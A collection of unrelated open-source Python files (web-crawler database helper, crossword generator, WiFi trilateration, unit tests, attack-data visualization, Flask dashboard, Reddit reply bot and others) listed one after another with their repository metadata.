cur.execute("INSERT INTO Domains VALUES (NULL,?,?,?)", (domain, indegree, outdegree))
# 写入到文件中
self.conn.commit()
def insertRuleset(self, ruleset, domain):
'''增加一个robots.txt规则集'''
cur = self.conn.cursor()
cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
did = cur.fetchone()[0]
cur.execute("INSERT INTO Rulesets VALUES (NULL,?,?)",(did, ruleset))
# 写入到文件
self.conn.commit()
def insertWebsite(self, url, domain):
'''增加一个网页,标记为未访问,并对相应的domain增加其入度'''
cur = self.conn.cursor()
cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
result = cur.fetchone()
if not result:
# 未有对应domain记录, 先创建domain, 把入度设为1
if VERBOSE:
print 'Spot Domain:',domain
self.insertDomain(domain, indegree=1)
cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
did = cur.fetchone()[0]
else:
did = result[0]
# 对应的domain记录已经存在, 对其入度+1
cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
cur.execute("INSERT INTO Websites VALUES (NULL,?,?,NULL,0)", (did, url,))
# 写入到文件
self.conn.commit()
def updateInfo(self, item, newlinks, oldlinks):
'''爬虫爬完之后对数据库内容进行更新'''
cur = self.conn.cursor()
cur.execute("SELECT wid,did FROM Websites WHERE url=?", (item['url'],))
wid, did = cur.fetchone()
# website记录更新
cur.execute("UPDATE Websites SET title=?,visited=1 WHERE wid=?", (item['title'], wid,))
# 对应的domain记录中出度也需要更新
cur.execute("UPDATE Domains SET outdegree=outdegree+? WHERE did=?", (len(item['links']), did,))
# 对该网页中所有链接涉及的记录进行更新
# 外部判断未出现过的链接
for link,domain in newlinks:
self.insertWebsite(link, domain)
# 外部判断出现过的链接
for link,domain in oldlinks:
# 对对应的domain记录入度增加
cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
# 写入到文件
self.conn.commit()
def robotsrulesetOfDomain(self, domain):
'''检查domain是否在数据库中,
否 --> (False, None)
是 --> (True, 数据库中存储的robots.txt内容)
'''
exist = False
cur = self.conn.cursor()
# 是否存在
cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
if cur.fetchone() :
exist = True
# 存在的话,结果是什么
cur.execute("SELECT rules FROM Domains,Rulesets "
"WHERE domain=? AND Domains.did=Rulesets.did"
,(domain,) )
ruleset = cur.fetchone()
return (exist, ruleset)
def rollback(self):
self.conn.rollback()
def showAll(self):
self.conn.commit()
cur = self.conn.cursor()
cur.execute("SELECT * FROM Domains")
print cur.fetchall()
cur.execute("SELECT * FROM Websites")
print cur.fetchall()
_dbcli = None
def getCliInstance():
global _dbcli
if not _dbcli:
_dbcli = DatabaseHelper()
return _dbcli
def test():
dbcli = getCliInstance()
# dbcli.insertDomain('jaysonhwang.com')
# dbcli.insertRuleset('test','jaysonhwang.com')
print dbcli.robotsrulesetOfDomain('www.zol.com')
print dbcli.robotsrulesetOfDomain('jayson.com')
dbcli.showAll()
dbcli.close()
if __name__ == '__main__':
test()
| JaySon-Huang/WebModel | WebModel/database/databasehelper.py | Python | mit | 4,676 |
# coding: utf-8
import re
from crossword import *
class Crossword2(Crossword):
def __init__(self):
self.grid = OpenGrid()
self.connected = {}
self.used_words = []
def copy(self):
copied = Crossword2()
copied.grid = self.grid.copy()
copied.connected = self.connected.copy()
copied.used_words = self.used_words[:]
return copied
def embed(self, pos, direction, word):
assert word not in self.used_words
super(Crossword2, self).embed(pos, direction, word)
self.used_words.append(word)
def all_disconnected_sequences(self):
'''
>>> c = Crossword2()
>>> c.embed((0, 0), HORIZONTAL, 'ANT')
>>> c.embed((0, 0), VERTICAL, 'ATOM')
>>> c.embed((1, 2), HORIZONTAL, 'IT')
>>> c.embed((3, 0), HORIZONTAL, 'MEET')
>>> c.dump()
_#____
#ANT#_
_T#IT#
_O____
#MEET#
_#____
>>> c.all_disconnected_sequences()
[((0, 2), 2, 'T'), ((1, 0), 2, 'T'), ((2, 0), 2, 'O'), ((0, 1), 1, 'N'), ((3, 1), 1, 'E'), ((0, 2), 1, 'TI'), ((0, 2), 1, 'TI.E'), ((3, 2), 1, 'E'), ((1, 3), 1, 'T'), ((1, 3), 1, 'T.T'), ((3, 3), 1, 'T')]
'''
sequences = []
for pos, direction, length in [((r, self.grid.colmin), HORIZONTAL, self.grid.width) for r in range(self.grid.rowmin, self.grid.rowmax + 1)] + [((self.grid.rowmin, c), VERTICAL, self.grid.height) for c in range(self.grid.colmin, self.grid.colmax + 1)]:
line = self.grid.get_word(pos, direction, length)
poslist = self.grid.poslist(pos, direction, length)
sequences += self.extract_sequences(line, poslist, direction)
return [(p, d, w) for (p, d, w) in sequences if not w.endswith('.')]
def extract_sequences(self, line, poslist, direction, idx=0, current_seq=None):
'''
>>> c = Crossword2()
>>> c.extract_sequences('ABC', [(0, 0), (0, 1), (0, 2)], HORIZONTAL)
[((0, 0), 2, 'ABC')]
>>> c.extract_sequences('_A_', [(0, 0), (0, 1), (0, 2)], HORIZONTAL)
[((0, 1), 2, 'A'), ((0, 1), 2, 'A.')]
>>> c.extract_sequences('A_C', [(0, 0), (0, 1), (0, 2)], HORIZONTAL)
[((0, 0), 2, 'A'), ((0, 0), 2, 'A.C'), ((0, 2), 2, 'C')]
>>> c.extract_sequences('A#C', [(0, 0), (0, 1), (0, 2)], HORIZONTAL)
[((0, 0), 2, 'A'), ((0, 2), 2, 'C')]
>>> c.extract_sequences('A_#B_C', [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0,5)], HORIZONTAL)
[((0, 0), 2, 'A'), ((0, 0), 2, 'A.'), ((0, 3), 2, 'B'), ((0, 3), 2, 'B.C'), ((0, 5), 2, 'C')]
>>> c.extract_sequences('A_B__C', [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0,5)], HORIZONTAL)
[((0, 0), 2, 'A'), ((0, 0), 2, 'A.B'), ((0, 2), 2, 'B'), ((0, 0), 2, 'A.B.'), ((0, 2), 2, 'B.'), ((0, 0), 2, 'A.B..C'), ((0, 2), 2, 'B..C'), ((0, 5), 2, 'C')]
'''
if not current_seq: current_seq = []
if idx >= len(line): return current_seq
c = line[idx]
pos = poslist[idx]
if c == FILLED:
return current_seq + self.extract_sequences(line, poslist, direction, idx + 1, [])
if c == EMPTY:
new_current_seq = [(p, d, s + '.') for (p, d, s) in current_seq]
return current_seq + self.extract_sequences(line, poslist, direction, idx + 1, new_current_seq)
if current_seq:
new_current_seq = [(p, d, s + c) for (p, d, s) in current_seq if not self.is_connected(poslist[idx - 1], pos)]
if any([s.endswith('.') for (p, d, s) in current_seq]):
new_current_seq.append((pos, direction, c))
return self.extract_sequences(line, poslist, direction, idx + 1, new_current_seq)
else:
new_current_seq = [(pos, direction, c)]
return self.extract_sequences(line, poslist, direction, idx + 1, new_current_seq)
def build_crossword2(words, monitor=False):
'''
>>> ans = list(build_crossword2(['ANT', 'ART', 'RAT']))
>>> ans[0].dump()
#ANT#
>>> ans[1].dump()
_#___
#ANT#
_R___
_T___
_#___
>>> ans[2].dump()
___#___
__#ANT#
___R___
#RAT#__
___#___
>>> ans[3].dump()
___#_
___R_
_#_A_
#ANT#
_R_#_
_T___
_#___
>>> ans[4].dump()
_#___
_R___
#ANT#
_T___
_#___
>>> ans[5].dump()
___#_
_#_A_
_R_R_
#ANT#
_T_#_
_#___
>>> ans[6].dump()
___#___
___R___
__#ANT#
#ART#__
___#___
>>> ans[7].dump()
___#_
___A_
___R_
#ANT#
___#_
>>> ans[8].dump()
___#__
_#RAT#
___R__
#ANT#_
___#__
>>> ans[9].dump()
___#_
_#_A_
_R_R_
#ANT#
_T_#_
_#___
>>> ans[10].dump()
___#___
___A___
__#RAT#
#ANT#__
___#___
>>> ans[11].dump()
___#_
___R_
___A_
#ANT#
___#_
>>> ans[12].dump()
___#__
_#ART#
___A__
#ANT#_
___#__
>>> ans[13].dump()
___#___
___R___
__#ART#
#ANT#__
___#___
>>> ans[14].dump()
___#_
___R_
_#_A_
#ANT#
_R_#_
_T___
_#___
>>> len(ans)
15
'''
crosswords = [Crossword2()]
crosswords[0].embed((0, 0), HORIZONTAL, words[0])
while True:
if not crosswords: break
crosswords = sorted(crosswords, key=lambda c: evaluate_crossword(c))
base = crosswords.pop(0)
if monitor:
print ('%d candidates...'%(len(crosswords)))
if isinstance(monitor, dict):
base.dump(empty=monitor['EMPTY'], filled=monitor['FILLED'])
else:
base.dump()
print ('')
try:
sequences = base.all_disconnected_sequences()
if is_valid_crossword(sequences):
yield base
candidates = generate_candidates(words, base, sequences)
crosswords += candidates
except ValueError:
# discard this base
pass
def is_valid_crossword(sequences):
return all([len(s) <= 1 or s.find('.') > -1 for _, _, s in sequences])
def generate_candidates(words, base, sequences):
fit_words = []
for sequence in sequences:
available_words = [w for w in words if w not in base.used_words]
fit_words_for_seq = [(p, d, w) for (p, d, w) in propose_words(sequence, available_words) if base.is_fit(p, d, w)]
_, _, s = sequence
if not fit_words_for_seq and len(s) > 1 and s.find('.') == -1:
# dead end; discard this base
raise ValueError('no candidates found')
fit_words += fit_words_for_seq
candidates = []
for p, d, w in fit_words:
copy = base.copy()
copy.embed(p, d, w)
candidates.append(copy)
return candidates
def propose_words(sequence, words):
(p, d, seq) = sequence
proposed_words = []
for word in words:
idx = 0
while True:
m = re.search(seq, word[idx:])
if not m: break
proposed_words.append((OpenGrid.pos_inc(p, -(m.start() + idx), d), d, word))
idx += m.start() + 1
return proposed_words
def evaluate_crossword(c):
# return -len(c.used_words)
return (c.grid.width + c.grid.height) * 1.0 / len(c.used_words) ** 2
# return (c.grid.width * c.grid.height) * 1.0 / sum([len(w) for w in c.used_words])
def pickup_crosswords(words, dump_option=None, monitor=False):
best = 9999
for c in build_crossword2(words, monitor=monitor):
if evaluate_crossword(c) < best:
if dump_option:
c.dump(empty=dump_option['EMPTY'], filled=dump_option['FILLED'])
else:
c.dump()
best = evaluate_crossword(c)
print ('score: %f'%(best))
print ('')
if __name__ == '__main__':
import doctest
doctest.testmod()
| yattom/crossword | crossword2.py | Python | mit | 7,931 |
import math
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def rssToEstimatedDistance(rss):
freq = 2462 # freq of WiFi channel 6
origDBm = -20 # estimate this value
loss = abs(origDBm - rss)
dist = 10 ** ( ( loss + 27.55 - 20 * math.log10(freq) ) / 20 )
return dist
def trilaterate(inSources, rss):
distances = []
distances.append( rssToEstimatedDistance(rss[0]) )
distances.append( rssToEstimatedDistance(rss[1]) )
distances.append( rssToEstimatedDistance(rss[2]) )
# find the three intersection points
tp1 = _findEqualPerp(inSources[0], inSources[1], distances[0], distances[1])
tp2 = _findEqualPerp(inSources[0], inSources[2], distances[0], distances[2])
tp3 = _findEqualPerp(inSources[1], inSources[2], distances[1], distances[2])
p = Point( (tp1.x + tp2.x + tp3.x) / 3, (tp1.y + tp2.y + tp3.y) / 3 )
return p
def _findEqualPerp(p1, p2, r1, r2):
# swap points if p2 is behind p2
if p2.x < p1.x:
temp = p2
p2 = p1
p1 = temp
# compute the equation for the line
deltaX = p2.x - p1.x
deltaY = p2.y - p1.y
if deltaX == 0:
slope = 999999999
else:
slope = deltaY / deltaX
intercept = p2.y - slope * p2.x
# compute the constant multiplier
lineLen = math.sqrt((p2.x - p1.x)**2 + (p2.y - p1.y)**2)
c = lineLen / (r1 + r2)
posOnLine = c * r1
angle = math.atan(slope)
touchingPoint = Point(math.cos(angle) * posOnLine + p1.x, math.sin(angle) * posOnLine + p1.y)
return touchingPoint
# test program
def main():
a = Point(1, 6)
b = Point(2, 3)
c = Point(5, 7)
t = trilaterate([a,b,c], [2,3,5])
print(t.x)
print(t.y)
if __name__ == '__main__':
main()
| DepthDeluxe/dot11sniffer | app/Trilateration_Colin.py | Python | mit | 1,799 |
import pytest
from swimlane.exceptions import ValidationError
def test_getattr_fallback(mock_record):
"""Verify cursor __getattr__ falls back to AttributeError for unknown cursor + list methods"""
with pytest.raises(AttributeError):
getattr(mock_record['Text List'], 'unknown_method')
def test_set_validation(mock_record):
"""Test directly setting a ListField value for validation"""
mock_record['Text List'] = ['text']
with pytest.raises(ValidationError):
mock_record['Text List'] = [123]
with pytest.raises(ValidationError):
mock_record['Text List'] = 123
with pytest.raises(ValidationError):
mock_record['Text List'] = 'text'
def test_modification_validation(mock_record):
"""Test calling list methods on cursor respects validation"""
mock_record['Text List'].append('text')
with pytest.raises(ValidationError):
mock_record['Text List'].append(123)
def test_numeric_range(mock_record):
"""Test item numeric range restrictions"""
key = 'Numeric List Range Limit'
mock_record[key] = [5]
with pytest.raises(ValidationError):
mock_record[key] = [3]
with pytest.raises(ValidationError):
mock_record[key] = [12]
def test_list_length_validation(mock_record):
"""List length validation check"""
key = 'Numeric List Range Limit'
mock_record[key] = [5, 6, 7]
with pytest.raises(ValidationError):
mock_record[key].append(8)
with pytest.raises(ValidationError):
mock_record[key] = []
def test_item_type_validation(mock_record):
"""Validate correct item type for text/numeric values"""
key = 'Numeric List Range Limit'
with pytest.raises(ValidationError):
mock_record[key] = ['text']
def test_min_max_word_validation(mock_record):
"""Validate against min/max word restrictions"""
key = 'Text List Word Limit'
with pytest.raises(ValidationError):
mock_record[key] = ['word ' * 10]
with pytest.raises(ValidationError):
mock_record[key] = ['word']
def test_min_max_char_validation(mock_record):
"""Min/max characters restriction validation"""
key = 'Text List Char Limit'
with pytest.raises(ValidationError):
mock_record[key] = ['defg', 'hijkl', 'mno pqr']
with pytest.raises(ValidationError):
mock_record[key] = ['']
def test_list_field_bulk_modify_value(mock_record):
"""Pass-through bulk_modify value"""
value = ['Test', 'Value']
assert mock_record.get_field('Text List').get_bulk_modify(value) == value
| Swimlane/sw-python-client | tests/fields/test_list.py | Python | mit | 2,579 |
callback_functions = ["collision_enter", "collision_stay", "collision_exit"]
length_area_world = 75
raise_exception = False
# import all required modules
from game import *
from gameobject import *
from contracts import *
from configuration import *
from component import *
from loader import *
from physics import *
from scene import *
from timeutils import *
from builtincomponents import *
from builtincomponents.camera import *
from builtincomponents.collider import *
from builtincomponents.sprite_renderer import *
from builtincomponents.transform import * | temdisponivel/temdisponivellib_pygame | temdisponivellib/__init__.py | Python | mit | 564 |
from functools import reduce
# constants used in the multGF2 function
mask1 = mask2 = polyred = None
def setGF2(degree, irPoly):
"""Define parameters of binary finite field GF(2^m)/g(x)
- degree: extension degree of binary field
- irPoly: coefficients of irreducible polynomial g(x)
"""
def i2P(sInt):
"""Convert an integer into a polynomial"""
return [(sInt >> i) & 1
for i in reversed(range(sInt.bit_length()))]
global mask1, mask2, polyred
mask1 = mask2 = 1 << degree
mask2 -= 1
polyred = reduce(lambda x, y: (x << 1) + y, i2P(irPoly)[1:])
def multGF2(p1, p2):
"""Multiply two polynomials in GF(2^m)/g(x)"""
p = 0
while p2:
if p2 & 1:
p ^= p1
p1 <<= 1
if p1 & mask1:
p1 ^= polyred
p2 >>= 1
return p & mask2
if __name__ == "__main__":
# Define binary field GF(2^3)/x^3 + x + 1
setGF2(127, 2**127 + 2**63 + 1)
# Evaluate the product (x^2 + x + 1)(x^2 + 1)
print("{:02x}".format(multGF2(0x3f7e0000000000000000000000000000L, 0x3f7e00000000000000000000L))) | srijs/hwsl2-core | calc.py | Python | mit | 1,141 |
# -*- coding: utf8 -*-
from __future__ import unicode_literals
import unittest
import os
import sys
from flake8.api import legacy as engine
if sys.version_info[0] == 3:
unicode = str
if sys.version_info[:2] == (2, 6):
# Monkeypatch to make tests work on 2.6
def assert_less(first, second, msg=None):
assert first > second
unittest.TestCase.assertLess = assert_less
class TestCodeComplexity(unittest.TestCase):
def test_flake8_conformance(self):
flake8style = engine.get_style_guide(
ignore=['E501'],
max_complexity=6
)
directory = 'flask_rollbar'
self.assertEqual(os.path.isdir(directory), True,
"Invalid test directory '%s'. You need to update test_flake8.py" % directory)
# Get all the files to check
files = []
for dirpath, dirnames, filenames in os.walk(directory):
for filename in [f for f in filenames if f.endswith(".py")]:
files += [os.path.join(dirpath, filename)]
result = flake8style.check_files(files)
self.assertEqual(result.total_errors, 0,
"Code found to be too complex or failing PEP8")
if __name__ == '__main__':
unittest.main()
| psykzz/flask-rollbar | tests/test_flake8.py | Python | mit | 1,281 |
import pyak
import yikbot
import time
# Latitude and Longitude of location where bot should be localized
yLocation = pyak.Location("42.270340", "-83.742224")
yb = yikbot.YikBot("yikBot", yLocation)
print "DEBUG: Registered yikBot with handle %s and id %s" % (yb.handle, yb.id)
print "DEBUG: Going to sleep, new yakkers must wait ~90 seconds before they can act"
time.sleep(90)
print "DEBUG: yikBot instance 90 seconds after initialization"
print vars(yb)
yb.boot() | congrieb/yikBot | start.py | Python | mit | 469 |
import prosper.datareader.exceptions
import prosper.datareader._version
| EVEprosper/ProsperDatareader | prosper/datareader/__init__.py | Python | mit | 72 |
"""
Visualization module.
"""
import numpy as np
from matplotlib import animation
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes
from mpl_toolkits.axes_grid1.inset_locator import mark_inset
from pca import create_handles
import warnings
warnings.filterwarnings('ignore')
def get_temp_markers(year, attacks):
"""
Gives all the information about the markers needed for the
year passed in argument.
"""
data_given_year = attacks[attacks['Year'] == year].reset_index()
num_markers = data_given_year.shape[0]
markers = np.zeros(num_markers, dtype=[('Longitude', float, 1),
('Latitude', float, 1),
('Size', float, 1),
('Color', float, 1)])
killed = data_given_year['Killed']
_MIN, _MAX, _MEDIAN = killed.min(), killed.max(), killed.median()
markers['Longitude'] = data_given_year['Longitude']
markers['Latitude'] = data_given_year['Latitude']
markers['Size'] = 10* np.abs(killed - _MEDIAN) + 1
markers['Color'] = (killed - _MIN)/(_MAX - _MIN)
return markers, _MAX
def world_view(attacks):
"""
Creates an animation where we see the evolution of the worldwide terrorist attacks
among the available years.
"""
fig = plt.figure(figsize=(10, 10))
cmap = plt.get_cmap('inferno')
# create the map
map = Basemap(projection='cyl')
map.drawmapboundary()
map.fillcontinents(color='lightgray', zorder=0)
# define the frame values (as 1993 is not contained in the database
# we have to remove it, otherwise we will have an empty frame)
frames = np.append(np.arange(1970, 1993), np.arange(1994, 2017))
# create the plot structure
temp_markers, _MAX = get_temp_markers(frames[0], attacks)
xs, ys = map(temp_markers['Longitude'], temp_markers['Latitude'])
scat = map.scatter(xs, ys, s=temp_markers['Size'], c=temp_markers['Color'], cmap=cmap, marker='o',
alpha=0.3, zorder=10)
year_text = plt.text(-170, 80, str(frames[0]),fontsize=15)
cbar = map.colorbar(scat, location='bottom')
cbar.set_label('number of killed people 0.0 = min [0] 1.0 = max [{}]' .format(_MAX))
plt.title('Activity of terrorism attacks from 1970 to 2016')
plt.savefig('world_view.pdf', bbox_inches='tight')
plt.show()
def update(year):
"""
Updates the content of each frame during the animation for
the year passed in argument.
"""
# retrieve necessary information from the markers
temp_markers, _MAX = get_temp_markers(year, attacks)
# update the map content
xs, ys = map(temp_markers['Longitude'], temp_markers['Latitude'])
scat.set_offsets(np.hstack((xs[:,np.newaxis], ys[:, np.newaxis])))
scat.set_color(cmap(temp_markers['Color']))
scat.set_sizes(temp_markers['Size'])
year_text.set_text(str(year))
cbar.set_label('number of killed people 0.0 = min [0] 1.0 = max [{}]' .format(_MAX))
return scat,
# create animation
ani = animation.FuncAnimation(fig, update, interval=1000, frames=frames, blit=True)
ani.save('visualization.mp4', writer = 'ffmpeg', fps=1, bitrate=-1)
plt.show()
def get_group_markers(attacks, group):
"""
Gives all the information about the markers for the
group passed in argument.
"""
data_given_group = attacks[attacks['Group'] == group]
num_markers = data_given_group.shape[0]
markers = np.zeros(num_markers, dtype=[('Longitude', float, 1),
('Latitude', float, 1),
('Size', float, 1),
('Color', float, 1)])
killed = data_given_group['Killed']
_MIN, _MAX, _MEDIAN = killed.min(), killed.max(), killed.median()
markers['Longitude'] = data_given_group['Longitude']
markers['Latitude'] = data_given_group['Latitude']
markers['Size'] = 10* np.abs(killed - _MEDIAN) + 1
markers['Color'] = (killed - _MIN)/(_MAX - _MIN)
return markers, _MAX
def zoom_taliban_intensity(attacks):
"""
Zooms in the particular location of the attacks perpetrated by the Taliban group
showing the intensity of the attacks.
"""
fig = plt.figure(figsize=(15,15))
ax = fig.add_subplot(111)
cmap = plt.get_cmap('inferno')
plt.title('Intensity of attacks perpetrated by the Taliban group\n')
# create the map
map = Basemap(projection='cyl',lat_0=0, lon_0=0)
map.drawmapboundary()
map.fillcontinents(color='lightgray', zorder=0)
# create the plot structure
temp_markers, _MAX = get_group_markers(attacks, 'Taliban')
xs, ys = map(temp_markers['Longitude'], temp_markers['Latitude'])
scat = map.scatter(xs, ys, s=temp_markers['Size'], c=temp_markers['Color'], cmap=cmap, marker='o',
alpha=0.3, zorder=10)
axins = zoomed_inset_axes(ax, 9, loc=2)
axins.set_xlim(25, 40)
axins.set_ylim(60, 75)
plt.xticks(visible=False)
plt.yticks(visible=False)
map2 = Basemap(llcrnrlon=55,llcrnrlat=25,urcrnrlon=75,urcrnrlat=40, ax=axins)
map2.drawmapboundary()
map2.fillcontinents(color='lightgray', zorder=0)
map2.drawcoastlines()
map2.drawcountries()
map2.scatter(xs, ys, s=temp_markers['Size']/5., c=cmap(temp_markers['Color']), alpha=0.5)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
plt.savefig('taliban_zoom_intensity.pdf', bbox_inches='tight')
plt.show()
def get_group_attack_types_markers(attacks, group):
"""
Gives the description of the attack types about the markers for the
group passed in argument.
"""
data_given_year = attacks[attacks['Group'] == group]
list_attack_type_unique = data_given_year['Attack_type'].unique().tolist()
list_attack_type = data_given_year['Attack_type'].tolist()
# assign each attack to the corresponding color
colors_attack_type = plt.cm.tab20(list(range(1,len(list_attack_type_unique)+1)))
label_color_dict_attack_type = dict(zip(list_attack_type_unique, colors_attack_type))
cvec_attack_type = [label_color_dict_attack_type[label] for label in list_attack_type]
num_markers = data_given_year.shape[0]
markers = np.zeros(num_markers, dtype=[('Longitude', float, 1),
('Latitude', float, 1),
('Size', float, 1),
('Color', float, 4)])
killed = data_given_year['Killed']
_MIN, _MAX, _MEDIAN = killed.min(), killed.max(), killed.median()
markers['Longitude'] = data_given_year['Longitude']
markers['Latitude'] = data_given_year['Latitude']
markers['Size'] = 100
markers['Color'] = np.array(cvec_attack_type)
return markers, label_color_dict_attack_type
def zoom_taliban_attack_types(attacks):
"""
Zooms in the particular location of the attacks perpetrated by the Taliban group
showing the different attack types.
"""
group = 'Taliban'
fig = plt.figure(figsize=(15,15))
ax = fig.add_subplot(111)
cmap = plt.get_cmap('inferno')
plt.title('Attack types perpetrated by the Taliban group\n')
# create the map
map = Basemap(projection='cyl',lat_0=0, lon_0=0)
map.drawmapboundary()
map.fillcontinents(color='lightgray', zorder=0)
# create the plot structure
temp_markers, _MAX = get_group_markers(attacks, group)
xs, ys = map(temp_markers['Longitude'], temp_markers['Latitude'])
scat = map.scatter(xs, ys, s=temp_markers['Size'], c=temp_markers['Color'], cmap=cmap, marker='o',
alpha=0.5, zorder=10)
axins = zoomed_inset_axes(ax, 9, loc=2)
axins.set_xlim(25, 40)
axins.set_ylim(60, 75)
plt.xticks(visible=False)
plt.yticks(visible=False)
map2 = Basemap(llcrnrlon=55,llcrnrlat=25,urcrnrlon=75,urcrnrlat=40, ax=axins)
map2.drawmapboundary()
map2.fillcontinents(color='lightgray', zorder=0)
map2.drawcoastlines()
map2.drawcountries()
temp_markers, label_color_dict_attack_type = get_group_attack_types_markers(attacks, group)
map2.scatter(xs, ys, s=temp_markers['Size']/5., c=temp_markers['Color'], alpha=0.5)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
handles = create_handles(label_color_dict_attack_type, ax)
labels = [h.get_label() for h in handles]
ax.legend(loc='upper left', bbox_to_anchor=(1, 1), handles=handles, labels=labels)
plt.savefig('taliban_zoom_attack_types.pdf', bbox_inches='tight')
plt.show()
| mdeff/ntds_2017 | projects/reports/terrorist_attacks/project/visualization.py | Python | mit | 8,333 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Ricardo Ribeiro"
__credits__ = ["Ricardo Ribeiro"]
__license__ = "MIT"
__version__ = "0.0"
__maintainer__ = "Ricardo Ribeiro"
__email__ = "[email protected]"
__status__ = "Development"
import time
from datetime import datetime, timedelta
def timeit(method):
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
te = time.time()
time_elapsed = datetime(1,1,1) + timedelta(seconds=(te-ts) )
print("%s: %d:%d:%d:%d;%d" % (method.__name__, time_elapsed.day-1, time_elapsed.hour, time_elapsed.minute, time_elapsed.second, time_elapsed.microsecond))
return result
return timed | sunj1/my_pyforms | pyforms/Utils/timeit.py | Python | mit | 694 |
from app.app_and_db import app
from flask import Blueprint, jsonify, render_template
import datetime
import random
import requests
dashboard = Blueprint('dashboard', __name__)
cumtd_endpoint = 'https://developer.cumtd.com/api/{0}/{1}/{2}'
cumtd_endpoint = cumtd_endpoint.format('v2.2', 'json', 'GetDeparturesByStop')
wunderground_endpoint = 'http://api.wunderground.com/api/{0}/hourly/q/{1}/{2}.json'
wunderground_endpoint = wunderground_endpoint.format(app.config['WUNDERGROUND_API_KEY'], 'IL', 'Champaign')
@dashboard.route('/')
def index():
time=datetime.datetime.now().time().strftime('%I:%M').lstrip('0')
return render_template('pages/dashboard.html', image_number=random.randrange(1, 9), time=time)
#Query no more than once a minute
@dashboard.route('/bus')
def bus_schedule():
params = {'key' : app.config['CUMTD_API_KEY'],
'stop_id' : 'GRN4TH',
'count' : '5'}
response = requests.get(cumtd_endpoint, params=params)
json = response.json()
departures = []
for departure in json['departures'] :
if departure['trip']['direction'] == 'East':
departures.append(departure)
return jsonify(departures=departures)
#Query no more than once every three minutes
@dashboard.route('/weather')
def weather():
response = requests.get(wunderground_endpoint)
json = response.json()
return jsonify(json)
app.register_blueprint(dashboard, url_prefix='/dashboard') | nickofbh/kort2 | app/dashboard/views.py | Python | mit | 1,414 |
from __future__ import print_function
import sys
sys.path.append('..') # help python find cyton.py relative to scripts folder
from openbci import cyton as bci
import logging
import time
def printData(sample):
# os.system('clear')
print("----------------")
print("%f" % (sample.id))
print(sample.channel_data)
print(sample.aux_data)
print("----------------")
if __name__ == '__main__':
# port = '/dev/tty.OpenBCI-DN008VTF'
port = '/dev/tty.usbserial-DB00JAM0'
# port = '/dev/tty.OpenBCI-DN0096XA'
baud = 115200
logging.basicConfig(filename="test.log", format='%(asctime)s - %(levelname)s : %(message)s', level=logging.DEBUG)
logging.info('---------LOG START-------------')
board = bci.OpenBCICyton(port=port, scaled_output=False, log=True)
print("Board Instantiated")
board.ser.write('v')
time.sleep(10)
board.start_streaming(printData)
board.print_bytes_in()
| OpenBCI/OpenBCI_Python | scripts/test.py | Python | mit | 937 |
__author__ = 'mengpeng'
import os
from unittest import TestCase
from pycrawler.scraper import DefaultScraper
from pycrawler.handler import Handler
from pycrawler.utils.tools import gethash
from test_scraper import SpiderTest
class TestTempHandler(TestCase):
def test_setargs(self):
h = Handler.get('TempHandler')(SpiderTest('testspider'))
self.assertEqual('./tmp/testspider/', h.args['path'])
args = {'path': './newpath/'}
h.setargs(args)
self.assertEqual('./newpath/testspider/', h.args['path'])
def test_parse(self):
h = Handler.get('TempHandler')(SpiderTest('testspider'))
h.parse('conent', 'testurl1')
self.assertTrue(os.path.exists(h._tmpfilename('testurl1')))
def test__tmpfilename(self):
h = Handler.get('TempHandler')(SpiderTest('testspider'))
self.assertEqual('./tmp/testspider/' + str(gethash('sample')) + '.html', h._tmpfilename('sample'))
self.assertTrue(os.path.exists('./tmp/')) | ymero/PyCrawler | test/test_handler.py | Python | mit | 996 |
import datetime
def suffix(d):
return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
def custom_strftime(format, t):
return t.strftime(format).replace('{S}', str(t.day) + suffix(t.day))
print "Welcome to GenerateUpdateLines, the nation's favourite automatic update line generator."
start = int(raw_input("Enter initial day number: "))
stop = int(raw_input("Enter final day number: "))
t0 = datetime.date(2018, 3, 24)
for d in range(start, stop+1):
date = t0 + datetime.timedelta(d-1)
print "| "+str(d)+" | "+custom_strftime("%a {S} %B", date)+" | | |"
# from datetime import datetime as dt
#
# def suffix(d):
# return 'th' if 11<=d<=13 else {1:'st',2:'nd',3:'rd'}.get(d%10, 'th')
#
# def custom_strftime(format, t):
# return t.strftime(format).replace('{S}', str(t.day) + suffix(t.day))
#
# print custom_strftime('%B {S}, %Y', dt.now())
| ArthurStart/arthurstart.github.io | GenerateUpdateLines.py | Python | mit | 889 |
#!/usr/bin/python
import praw
import re
import os
import pickle
from array import *
import random
#REPLY = "I want all the bacon and eggs you have."
REPLY = array('i',["I want all the bacon and eggs you have", "I know what I'm about son", "I'm not interested in caring about people", "Is this not rap?"])
if not os.path.isfile("inigo_config.txt"):
print "You must create the file swanson_config.txt with the pickled credentials."
exit(1)
else:
print "Loading credentials"
user_data = pickle.load( open("swanson_config.txt","rb"))
#print user_data
user_agent = ("Swanson bot 0.1 created by /u/dcooper2.")
r = praw.Reddit(user_agent=user_agent)
r.login(user_data[0], user_data[1])
del user_data
print "Successfully logged in"
# Check for previous replies
if not os.path.isfile("replies.txt"):
replies = []
else:
print "Loading previous reply ids"
with open("replies.txt", "r") as f:
replies = f.read()
replies = replies.split("\n")
replies = filter(None, replies)
# Check for new items to reply to
subreddit = r.get_subreddit('umw_cpsc470Z')
print "Checking for new posts"
for submission in subreddit.get_hot(limit=10):
print "Checking submission ", submission.id
if submission.id not in replies:
if re.search("Ron Swanson", submission.title, re.IGNORECASE) or re.search("Ron Swanson", submission.selftext, re.IGNORECASE):
x = random.randint(0,3)
submission.add_comment(REPLY[x])
print "Bot replying to submission: ", submission.id
